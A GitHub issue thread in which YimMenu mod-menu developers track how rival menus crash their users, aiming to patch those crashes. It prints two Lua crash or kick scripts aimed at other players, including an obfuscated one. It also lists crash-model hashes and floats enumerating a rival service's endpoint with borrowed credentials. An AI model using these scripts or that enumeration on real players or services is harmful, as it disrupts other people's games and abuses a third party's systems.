### ISSUE TITLE
[Improvement]: Can still be crashed 

### ISSUE THREAD

**Issue by BigboiKilljoy** [Yimura/YimMenu#2842]
### Which feature

I was in chat telling people about some of the things this menu could do without naming it, you know hyping it up cause its cool. And then someone else said "then again its Yim" to which i got crashed 3 seconds later with a final message from the menu saying Tim did it, we can assume this is some spoofed bullshit. Who ever this is they must know a fair amount about this menu and they also clearly have a menu that not many other people do, its either expensive or self made. And no it is not a coincidence, there was nothing causing me lag at the time and my game simply doesn't crash by itself. 

### Reason

I don't enjoy being crashed lol

### Additional context

![Desktop Screenshot 2024 03 18 - 11 28 13 89](https://github.com/YimMenu/YimMenu/assets/134345497/ebda9f42-fb10-4177-aaba-b43746102f6b)
[cout.log](https://github.com/YimMenu/YimMenu/files/14638737/cout.log)

**Comment by GreySideMM** [comment]
(Most likely) duplicate of #2672.
Yes, there are quite some other mod devs out there. But Stand is currently capable of crashing YM and it's a really widespread menu, too.

**Comment by dantheman89** [comment]
yes and  casino script is not working
yim menu loads fine but casino script is not working i would use to give money for my frnds in that but dono what happens its not working

**Comment by Tayipc38** [comment]
> yes and casino script is not working yim menu loads fine but casino script is not working i would use to give money for my frnds in that but dono what happens its not working

Rather weird of you to hijack this issue with this random bs. Lua scripts are of no relevance on this repo. Consult on the relevant repo.

**Comment by BigboiKilljoy** [comment]
> (Most likely) duplicate of #2672. Yes, there are quite some other mod devs out there. But Stand is currently capable of crashing YM and it's a really widespread menu, too.

It's probably some Lua script because if it was just default stand, id get crashed more often.

**Comment by Deedaoz** [comment]
If you had force session host on then he can detect that. And yes, Stand's default crashes will work on Yim.

> > (Most likely) duplicate of #2672. Yes, there are quite some other mod devs out there. But Stand is currently capable of crashing YM and it's a really widespread menu, too.
> 
> It's probably some Lua script because if it was just default stand, id get crashed more often.

**Comment by ghost** [comment]
Like i mentioned in a previous comment (issue https://github.com/YimMenu/YimMenu/issues/2672), Some lua scrips on stand seem to be able to detect YimMenu if certain features are enabled. This is a problem and im trying to solve it in my free time. For now though i might open a merge request which blocks more crashing models which should help with model based crashes but not script based ones or anything else.

**Comment by ToXicVibezz** [comment]
![timmm](https://github.com/YimMenu/YimMenu/assets/126139384/80475b39-1902-4d86-ab60-0faf8a5a370d)
ive crashed him with yim several times now and not been crashed he cant be on anything good

**Comment by ghost** [comment]
> ![timmm](https://private-user-images.githubusercontent.com/126139384/314745007-80475b39-1902-4d86-ab60-0faf8a5a370d.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MTA5NzU2ODcsIm5iZiI6MTcxMDk3NTM4NywicGF0aCI6Ii8xMjYxMzkzODQvMzE0NzQ1MDA3LTgwNDc1YjM5LTE5MDItNGQ4Ni1hYjYwLTBmYWY4YTVhMzcwZC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwMzIwJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDMyMFQyMjU2MjdaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0yNjM4OTM5NjUzOGJjMTNmNWUwMGM4YzJmNmRhYmQwMTM3MjMwMjllYjJjM2M0OTYwYzhjNjliZTM4ZGVmNjk5JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.S3kwXr-lIstHWX-z9Jl9SHO-2hhFaLzN2V7pFrqp56Q) ive crashed him with yim several times now and not been crashed he cant be on anything good

I will join him and see what menu he is using. I have most of the paid mod menus to test with anyways so he can try and crash me if he wants.

**Comment by gir489returns** [comment]
> I have most of the paid mod menus
Why?

**Comment by ghost** [comment]
> > I have most of the paid mod menus
> 
> Why?

For fun. Also helps when a new menu has a new "unblockable" crash as i dont have to wait for people to help me test. Also that modder appears to be using stand.

**Comment by gir489returns** [comment]
> > > I have most of the paid mod menus
> > 
> > 
> > Why?
> 
> For fun. Also helps when a new menu has a new "unblockable" crash as i dont have to wait for people to help me test. Also that modder appears to be using stand.

Fair. If you can figure out what crash he's using and use it against @maybegreat48, he could probably figure out a way to patch it.

**Comment by ToXicVibezz** [comment]
> > > I have most of the paid mod menus
> > 
> > 
> > Why?
> 
> For fun. Also helps when a new menu has a new "unblockable" crash as i dont have to wait for people to help me test. Also that modder appears to be using stand.

How are you sure that he has the Stand. I have menus except 2take1 . Ive always used Yim personal preference.

**Comment by gir489returns** [comment]
> > > > I have most of the paid mod menus
> > > 
> > > 
> > > Why?
> > 
> > 
> > For fun. Also helps when a new menu has a new "unblockable" crash as i dont have to wait for people to help me test. Also that modder appears to be using stand.
> 
> How are you sure that he has the Stand. I have menus except 2take1 . Ive always used Yim personal preference.

He didn't say that he did, he just said he has a lot of pay menus.

**Comment by ghost** [comment]
> > > > I have most of the paid mod menus
> > > 
> > > 
> > > Why?
> > 
> > 
> > For fun. Also helps when a new menu has a new "unblockable" crash as i dont have to wait for people to help me test. Also that modder appears to be using stand.
> 
> Fair. If you can figure out what crash he's using and use it against @maybegreat48, he could probably figure out a way to patch it.

Sounds good i like the idea of teaming up against people @maybegreat48 let me know if you want to do this as i can use stand ultimate to help us patch this. Like i did with the model list i added in attempt to fix https://github.com/YimMenu/YimMenu/issues/2672

**Comment by ghost** [comment]
> > > > I have most of the paid mod menus
> > > 
> > > 
> > > Why?
> > 
> > 
> > For fun. Also helps when a new menu has a new "unblockable" crash as i dont have to wait for people to help me test. Also that modder appears to be using stand.
> 
> How are you sure that he has the Stand. I have menus except 2take1 . Ive always used Yim personal preference.

I joined him via social club and he triggered a "Stand user (co-load)" detection. FYI this is the detection a user who has stand ID on and is co loading another mod menu would trigger. I know this because i have tested lots of protections against stand for my own mod menu.

**Comment by gir489returns** [comment]
> I joined him via social club and he triggered a "Stand user (co-load)" detection. FYI this is the detection a user who has stand ID on and is co loading another mod menu would trigger. I know this because i have tested lots of protections against stand for my own mod menu.

Would you mine sharing how we can detect them?

**Comment by ghost** [comment]
> > I joined him via social club and he triggered a "Stand user (co-load)" detection. FYI this is the detection a user who has stand ID on and is co loading another mod menu would trigger. I know this because i have tested lots of protections against stand for my own mod menu.
> 
> Would you mine sharing how we can detect them?

I use the stand mod menu, I don't think we can publicly detect it though. I think it would require authentication (stand account) from what i can see in the wireshark logs.

**Comment by BigboiKilljoy** [comment]
> > > I joined him via social club and he triggered a "Stand user (co-load)" detection. FYI this is the detection a user who has stand ID on and is co loading another mod menu would trigger. I know this because i have tested lots of protections against stand for my own mod menu.
> > 
> > 
> > Would you mine sharing how we can detect them?
> 
> I use the stand mod menu, I don't think we can publicly detect it though. I think it would require authentication (stand account) from what i can see in the wireshark logs.

If you're looking for someone who can try to crash you with a bunch of different scripts join moss-y. I also joined them to see if they could crash me again, they told me they were using lua scripts and got a bunch of different ones for crashing. Then he tried to crash me with all of them and failed every single time, good menu!

**Comment by ghost** [comment]
> > > > I joined him via social club and he triggered a "Stand user (co-load)" detection. FYI this is the detection a user who has stand ID on and is co loading another mod menu would trigger. I know this because i have tested lots of protections against stand for my own mod menu.
> > > 
> > > 
> > > Would you mine sharing how we can detect them?
> > 
> > 
> > I use the stand mod menu, I don't think we can publicly detect it though. I think it would require authentication (stand account) from what i can see in the wireshark logs.
> 
> If you're looking for someone who can try to crash you with a bunch of different scripts join moss-y. I also joined them to see if they could crash me again, they told me they were using lua scripts and got a bunch of different ones for crashing. Then he tried to crash me with all of them and failed every single time, good menu!

Ah yes "Gamecrunch" very old crash from the lance script lua. Nothing sophisticated about that one i think literally all menus have protection against that

**Comment by gir489returns** [comment]
> I use the stand mod menu, I don't think we can publicly detect it though. I think it would require authentication (stand account) from what i can see in the wireshark logs.

Interesting. I know they keep a list of known Yim menu users, which is how they know when it's one of us. MBG told me they can "detect" him on his main account, but when he uses a fresh account they can't. Maybe we can do the same thing to them? I wonder how secure that Stand endpoint is. Maybe we can pull a ballstorture and iterate every SCID and ask the Stand endpoint with your credentials if they exist as stand users. That would build a blacklist of stand users.

**Comment by ghost** [comment]
> > I use the stand mod menu, I don't think we can publicly detect it though. I think it would require authentication (stand account) from what i can see in the wireshark logs.
> 
> Interesting. I know they keep a list of known Yim menu users, which is how they know when it's one of us. MBG told me they can "detect" him on his main account, but when he uses a fresh account they can't. Maybe we can do the same thing to them? I wonder how secure that Stand endpoint is. Maybe we can pull a ballstorture and iterate every SCID and ask the Stand endpoint with your credentials if they exist as stand users. That would build a blacklist of stand users.

All they do is keep a huge array of users and they "detect" it using that. AFAIK it is fetched from the stand API. Next thing to do would be to pull a dirty and either: Reverse engineer the traffic using a fake server or Decompile the stand DLL (Compressed with UPX and the UPX header removed to "hide" the DLL)

As for that API i think from what i can tell it only can detect users when they are online so that wouldn't really work anyways. I could start logging any stand users i run into and we do the same as the but that seems a bit annoying.

**Comment by ghost** [comment]
In the meantime i have added some more model crash protections to YimMenu and have created a pull request. This should stop menus like North etc from crashing YimMenu with models. I am still working on the elegant crash form stand but burger king foot lettuce and vehicle manslaughter should be patched (Steamroller is already path in YimMenu but not 2t1 :joy:)

**Comment by gir489returns** [comment]
@maybegreat48 reports that he cannot be crashed with stock Stand. Perhaps this user has some Lua that we don't know about that can crash us?

**Comment by gir489returns** [comment]
@xynnylol I found this repo that's basically Yim with crashes. https://github.com/Anti-Socialist/Prometheus-Source/tree/646fca0fee08de4e4aa853f98adf89631e60b438/src/backend/commands/player/crash

Do you know if you added all the models from ultimate_crash.cpp?

**Comment by GreySideMM** [comment]
> @xynnylol I found this repo that's basically Yim with crashes. https://github.com/Anti-Socialist/Prometheus-Source/tree/646fca0fee08de4e4aa853f98adf89631e60b438/src/backend/commands/player/crash
> 
> Do you know if you added all the models from ultimate_crash.cpp?

Oh well...
I checked and all but `-1288391198` and `92962485` are now already in our list. (310817095 is prop_fragtest_cnst_04)

**Comment by ghost** [comment]
> > @xynnylol I found this repo that's basically Yim with crashes. https://github.com/Anti-Socialist/Prometheus-Source/tree/646fca0fee08de4e4aa853f98adf89631e60b438/src/backend/commands/player/crash
> > Do you know if you added all the models from ultimate_crash.cpp?
> 
> Oh well... I checked and all but `-1288391198` and `92962485` are now already in our list. (310817095 is prop_fragtest_cnst_04)

I think during testing they didnt actually crash i can double check once i spin up a vm to try that menu against latest yim

**Comment by ghost** [comment]
> @maybegreat48 reports that he cannot be crashed with stock Stand. Perhaps this user has some Lua that we don't know about that can crash us?

There was something going on with the elegant crash that was crashing yim hard (https://github.com/YimMenu/YimMenu/issues/2672) i will try with stand ultimate and a bunch of test accounts and report back. I know one lua could crash yim but i cant seem to get it to work

**Comment by GreySideMM** [comment]
Idk know what the hell is going on: So I tried like a docent of items of our object list (latest + xynny's additions) + another docent of an really old crash object list I recently found online. And absolute non did crash my game?! Either no object appeared or just nothing happened at all.
Did R* fix something in their latest update? I tried this in online mode. I spawned them on myself using sch.lua

**Comment by ghost** [comment]
> Idk know what the hell is going on: So I tried like a docent of items of our object list (latest + xynny's additions) + another docent of an really old crash object list I recently found online. And absolute non did crash my game?! Either no object appeared or just nothing happened at all. Did R* fix something in their latest update? I tried this in online mode. I spawned them on myself using sch.lua

With yimmenu? I think yimmenu blocks them from spawning not sure yet as i havent fully read the source code

**Comment by ghost** [comment]
I think this LUA script for stand still crashes YimMenu will test in a bit.

```
-- HEY REBOUND, NORTH, OR FRONTIER DEVS:
    -- YOUR MENU IS S***! 
    -- YOUR MENU IS IRRELEVANT!
    -- PEOPLE ONLY TALK ABOUT YOUR MENU TO INSULT IT!
    -- GET GOOD!
    menu.action(ls_hostile, translations.gamecrunch_crash, {"gamecrunchcrash"}, "", function(on_input)

        -- initialize script event tables
        local crash_tbl = {"SWYHWTGYSWTYSUWSLSWTDSEDWSRTDWSOWSW45ERTSDWERTSVWUSWS5RTDFSWRTDFTSRYE","6825615WSHKWJLW8YGSWY8778SGWSESBGVSSTWSFGWYHSTEWHSHWG98171S7HWRUWSHJH","GHWSTFWFKWSFRWDFSRFSRTDFSGICFWSTFYWRTFYSSFSWSYWSRTYFSTWSYWSKWSFCWDFCSW",}
        local crash_tbl_2 = {{17, 32, 48, 69},{14, 30, 37, 46, 47, 63},{9, 27, 28, 60}}

        -- sanity checks 
        if pid == players.user() then 
            notify(translations.cannot_crash_self)
            return 
        end

        if pid == players.get_host() then 
            notify(translations.cannot_crash_host)
            return
        end
        -- start, countdown so the notif goes thru
        notify(translations.crash_in_progress)
        util.yield(1000)

        -- begin compiling 
        local cur_crash_meth = ""
        local cur_crash = ""
        for a,b in pairs(crash_tbl_2) do
            cur_crash = ""
            for c,d in pairs(b) do
                cur_crash = cur_crash .. string.sub(crash_tbl[a], d, d)
            end
            cur_crash_meth = cur_crash_meth .. cur_crash
        end
        local crash_keys = {"NULL", "VOID", "NaN", "127563/0", "NIL"}
        local crash_table = {109, 101, 110, 117, 046, 116, 114, 105, 103, 103, 101, 114, 095, 099, 111, 109, 109, 097, 110, 100, 115, 040}
        local crash_str = ""
        for k,v in pairs(crash_table) do
            crash_str = crash_str .. string.char(crash_table[k])
        end
        menu.trigger_commands("spectate" .. players.get_name(players.user()))
        util.yield(500)
        local this_int = 1
        while this_int < 1000 do 
            this_int += 1
        end
        local crash_compiled_func = load(crash_str .. '\"' .. cur_crash_meth .. players.get_name(pid) .. '\")')
        pcall(crash_compiled_func)
    end)
```

**Comment by ToXicVibezz** [comment]
> I think this LUA script for stand still crashes YimMenu will test in a bit.
> 
> ```
> -- HEY REBOUND, NORTH, OR FRONTIER DEVS:
>     -- YOUR MENU IS S***! 
>     -- YOUR MENU IS IRRELEVANT!
>     -- PEOPLE ONLY TALK ABOUT YOUR MENU TO INSULT IT!
>     -- GET GOOD!
>     menu.action(ls_hostile, translations.gamecrunch_crash, {"gamecrunchcrash"}, "", function(on_input)
> 
>         -- initialize script event tables
>         local crash_tbl = {"SWYHWTGYSWTYSUWSLSWTDSEDWSRTDWSOWSW45ERTSDWERTSVWUSWS5RTDFSWRTDFTSRYE","6825615WSHKWJLW8YGSWY8778SGWSESBGVSSTWSFGWYHSTEWHSHWG98171S7HWRUWSHJH","GHWSTFWFKWSFRWDFSRFSRTDFSGICFWSTFYWRTFYSSFSWSYWSRTYFSTWSYWSKWSFCWDFCSW",}
>         local crash_tbl_2 = {{17, 32, 48, 69},{14, 30, 37, 46, 47, 63},{9, 27, 28, 60}}
> 
>         -- sanity checks 
>         if pid == players.user() then 
>             notify(translations.cannot_crash_self)
>             return 
>         end
> 
>         if pid == players.get_host() then 
>             notify(translations.cannot_crash_host)
>             return
>         end
>         -- start, countdown so the notif goes thru
>         notify(translations.crash_in_progress)
>         util.yield(1000)
> 
>         -- begin compiling 
>         local cur_crash_meth = ""
>         local cur_crash = ""
>         for a,b in pairs(crash_tbl_2) do
>             cur_crash = ""
>             for c,d in pairs(b) do
>                 cur_crash = cur_crash .. string.sub(crash_tbl[a], d, d)
>             end
>             cur_crash_meth = cur_crash_meth .. cur_crash
>         end
>         local crash_keys = {"NULL", "VOID", "NaN", "127563/0", "NIL"}
>         local crash_table = {109, 101, 110, 117, 046, 116, 114, 105, 103, 103, 101, 114, 095, 099, 111, 109, 109, 097, 110, 100, 115, 040}
>         local crash_str = ""
>         for k,v in pairs(crash_table) do
>             crash_str = crash_str .. string.char(crash_table[k])
>         end
>         menu.trigger_commands("spectate" .. players.get_name(players.user()))
>         util.yield(500)
>         local this_int = 1
>         while this_int < 1000 do 
>             this_int += 1
>         end
>         local crash_compiled_func = load(crash_str .. '\"' .. cur_crash_meth .. players.get_name(pid) .. '\")')
>         pcall(crash_compiled_func)
>     end)
> ```

this is nothing .. count the array to the numbers its just kicks

**Comment by ghost** [comment]
> > I think this LUA script for stand still crashes YimMenu will test in a bit.
> > ```
> > -- HEY REBOUND, NORTH, OR FRONTIER DEVS:
> >     -- YOUR MENU IS S***! 
> >     -- YOUR MENU IS IRRELEVANT!
> >     -- PEOPLE ONLY TALK ABOUT YOUR MENU TO INSULT IT!
> >     -- GET GOOD!
> >     menu.action(ls_hostile, translations.gamecrunch_crash, {"gamecrunchcrash"}, "", function(on_input)
> > 
> >         -- initialize script event tables
> >         local crash_tbl = {"SWYHWTGYSWTYSUWSLSWTDSEDWSRTDWSOWSW45ERTSDWERTSVWUSWS5RTDFSWRTDFTSRYE","6825615WSHKWJLW8YGSWY8778SGWSESBGVSSTWSFGWYHSTEWHSHWG98171S7HWRUWSHJH","GHWSTFWFKWSFRWDFSRFSRTDFSGICFWSTFYWRTFYSSFSWSYWSRTYFSTWSYWSKWSFCWDFCSW",}
> >         local crash_tbl_2 = {{17, 32, 48, 69},{14, 30, 37, 46, 47, 63},{9, 27, 28, 60}}
> > 
> >         -- sanity checks 
> >         if pid == players.user() then 
> >             notify(translations.cannot_crash_self)
> >             return 
> >         end
> > 
> >         if pid == players.get_host() then 
> >             notify(translations.cannot_crash_host)
> >             return
> >         end
> >         -- start, countdown so the notif goes thru
> >         notify(translations.crash_in_progress)
> >         util.yield(1000)
> > 
> >         -- begin compiling 
> >         local cur_crash_meth = ""
> >         local cur_crash = ""
> >         for a,b in pairs(crash_tbl_2) do
> >             cur_crash = ""
> >             for c,d in pairs(b) do
> >                 cur_crash = cur_crash .. string.sub(crash_tbl[a], d, d)
> >             end
> >             cur_crash_meth = cur_crash_meth .. cur_crash
> >         end
> >         local crash_keys = {"NULL", "VOID", "NaN", "127563/0", "NIL"}
> >         local crash_table = {109, 101, 110, 117, 046, 116, 114, 105, 103, 103, 101, 114, 095, 099, 111, 109, 109, 097, 110, 100, 115, 040}
> >         local crash_str = ""
> >         for k,v in pairs(crash_table) do
> >             crash_str = crash_str .. string.char(crash_table[k])
> >         end
> >         menu.trigger_commands("spectate" .. players.get_name(players.user()))
> >         util.yield(500)
> >         local this_int = 1
> >         while this_int < 1000 do 
> >             this_int += 1
> >         end
> >         local crash_compiled_func = load(crash_str .. '\"' .. cur_crash_meth .. players.get_name(pid) .. '\")')
> >         pcall(crash_compiled_func)
> >     end)
> > ```
> 
> this is nothing .. count the array to the numbers its just kicks

Yea realised after. Doesn't work anyways

**Comment by ToXicVibezz** [comment]
```
	local pCoords = Player.getPlayerPosition(pid)
	local trafficLights = {}
	util.request_model(-655644382)
	for i = 1, 20 do
	    local object = entities.create_object(-655644382, v3.new(pCoords.x + Utils.rand(-5, 5), pCoords.y + Utils.rand(-5, 5), pCoords.z + Utils.rand(-1, 0)))
	    ENTITY.SET_ENTITY_ROTATION(object, 0, 0, Utils.rand(0, 360), 1, true)
	    trafficLights[#trafficLights + 1] = object
	end
	local stopLights = false
	util.create_tick_handler(function()
	    if stopLights then
	        return false
	    end
	    ENTITY.SET_ENTITY_TRAFFICLIGHT_OVERRIDE(trafficLights[Utils.rand(1, #trafficLights)], Utils.rand(0, 3))
	end)
	util.request_model(3253274834)
	local vehicles = {}
	local crashVehicle = entities.create_vehicle(3253274834, pCoords, 0)
	vehicles[#vehicles + 1] = crashVehicle
	VEHICLE.SET_VEHICLE_MOD_KIT(crashVehicle, 0)
	Vehicle.setVehiclePlate(crashVehicle, "ICRASHU")
	VEHICLE.SET_VEHICLE_MOD(crashVehicle, 34, 3)
	for i = 1, 10 do
	    vehicles[#vehicles + 1] = Vehicle.clone(crashVehicle)
	end
	util.yield(3000)
	for i = 1, #vehicles do
	    Entity.delete(vehicles[i])
	end
	util.yield(5000)
	stopLights = true
	util.yield(500)
	for i = 1, #trafficLights do
	    Entity.delete(trafficLights[i])
	end
	STREAMING.SET_MODEL_AS_NO_LONGER_NEEDED(3253274834)
	STREAMING.SET_MODEL_AS_NO_LONGER_NEEDED(-655644382)
```

**Comment by GreySideMM** [comment]
YimMenu blocks objects only when they are spawned via the network. But maybe the game crashes only when someone else spawns them / or they have to network (I was alone in session when tested).
Some other concerning thing I have never seen before: I suspect Relay Object Spawning is possible? One player tried to object crash me with a constant flow of object creations (hundreds of them, all the same object). Then that player stopped and the next random player did the same. And then a third. All tried to spawn `gr_prop_gr_rsply_crate01a` which is one of the object you added. No one left the session, so no one had crashed (apparently). Non of these players where near me.

I need to retest the lists I mentioned before. I made a mistake with file comparison tool before. I tested old objects, will do tomorrow.

**Comment by ghost** [comment]
> ```
> 	local pCoords = Player.getPlayerPosition(pid)
> 	local trafficLights = {}
> 	util.request_model(-655644382)
> 	for i = 1, 20 do
> 	    local object = entities.create_object(-655644382, v3.new(pCoords.x + Utils.rand(-5, 5), pCoords.y + Utils.rand(-5, 5), pCoords.z + Utils.rand(-1, 0)))
> 	    ENTITY.SET_ENTITY_ROTATION(object, 0, 0, Utils.rand(0, 360), 1, true)
> 	    trafficLights[#trafficLights + 1] = object
> 	end
> 	local stopLights = false
> 	util.create_tick_handler(function()
> 	    if stopLights then
> 	        return false
> 	    end
> 	    ENTITY.SET_ENTITY_TRAFFICLIGHT_OVERRIDE(trafficLights[Utils.rand(1, #trafficLights)], Utils.rand(0, 3))
> 	end)
> 	util.request_model(3253274834)
> 	local vehicles = {}
> 	local crashVehicle = entities.create_vehicle(3253274834, pCoords, 0)
> 	vehicles[#vehicles + 1] = crashVehicle
> 	VEHICLE.SET_VEHICLE_MOD_KIT(crashVehicle, 0)
> 	Vehicle.setVehiclePlate(crashVehicle, "ICRASHU")
> 	VEHICLE.SET_VEHICLE_MOD(crashVehicle, 34, 3)
> 	for i = 1, 10 do
> 	    vehicles[#vehicles + 1] = Vehicle.clone(crashVehicle)
> 	end
> 	util.yield(3000)
> 	for i = 1, #vehicles do
> 	    Entity.delete(vehicles[i])
> 	end
> 	util.yield(5000)
> 	stopLights = true
> 	util.yield(500)
> 	for i = 1, #trafficLights do
> 	    Entity.delete(trafficLights[i])
> 	end
> 	STREAMING.SET_MODEL_AS_NO_LONGER_NEEDED(3253274834)
> 	STREAMING.SET_MODEL_AS_NO_LONGER_NEEDED(-655644382)
> ```

Yes, I already decompiled it. I will add more models to the list (Found some new ones while debugging my menu.)

**Comment by ghost** [comment]
> YimMenu blocks objects only when they are spawned via the network. But maybe the game crashes only when someone else spawns them / or they have to network (I was alone in session when tested). Some other concerning thing I have never seen before: I suspect Relay Object Spawning is possible? One player tried to object crash me with a constant flow of object creations (hundreds of them, all the same object). Then that player stopped and the next random player did the same. And then a third. All tried to spawn `gr_prop_gr_rsply_crate01a` which is one of the object you added. No one left the session, so no one had crashed (apparently). Non of these players where near me.
> 
> I need to retest the lists I mentioned before. I made a mistake with file comparison tool before. I tested old objects, will do tomorrow.

For a sanity check, Please spawn `v_res_tt_porndvd01` ( 419020243 ) this is a new crash model i found

I have about 200+ in my menu but some were already in YimMenu when i made the first commit

**Comment by GreySideMM** [comment]
> For a sanity check, Please spawn `v_res_tt_porndvd01` ( 419020243 ) this is a new crash model i found
> 
> I have about 200+ in my menu but some were already in YimMenu when i made the first commit

That one spawned for me without any problems, even displaying. Same goes for `gr_prop_gr_rsply_crate01` too. This is getting strange - my game just won't crash. Did R* fix this? (Or does it not crash on Linux, for whatever reason? Idk if object ever did, never tested before. lol.)

**Comment by ghost** [comment]
> > For a sanity check, Please spawn `v_res_tt_porndvd01` ( 419020243 ) this is a new crash model i found
> > I have about 200+ in my menu but some were already in YimMenu when i made the first commit
> 
> That one spawned for me without any problems, even displaying. Same goes for `gr_prop_gr_rsply_crate01` too. This is getting strange - my game just won't crash. Did R* fix this? (Or does it not crash on Linux, for whatever reason? Idk if object ever did, never tested before. lol.)

Weird, When i spawned it on a test account on artix linux it crashed

**Comment by ghost** [comment]
> > > For a sanity check, Please spawn `v_res_tt_porndvd01` ( 419020243 ) this is a new crash model i found
> > > I have about 200+ in my menu but some were already in YimMenu when i made the first commit
> > 
> > 
> > That one spawned for me without any problems, even displaying. Same goes for `gr_prop_gr_rsply_crate01` too. This is getting strange - my game just won't crash. Did R* fix this? (Or does it not crash on Linux, for whatever reason? Idk if object ever did, never tested before. lol.)
> 
> Weird, When i spawned it on a test account on artix linux it crashed

Maybe it crashes when a remote player tries to so that not sure i will test again with linux, windows and macos. I doubt r* gives enough of a toss to fix it tho they only care about $$$ u hurt that they fix it same day.

**Comment by Yimura** [comment]
Closing this as there will be more crash reports coming in where there will be again no real conclusion on what caused the crash. Combined with the discussion having died down.
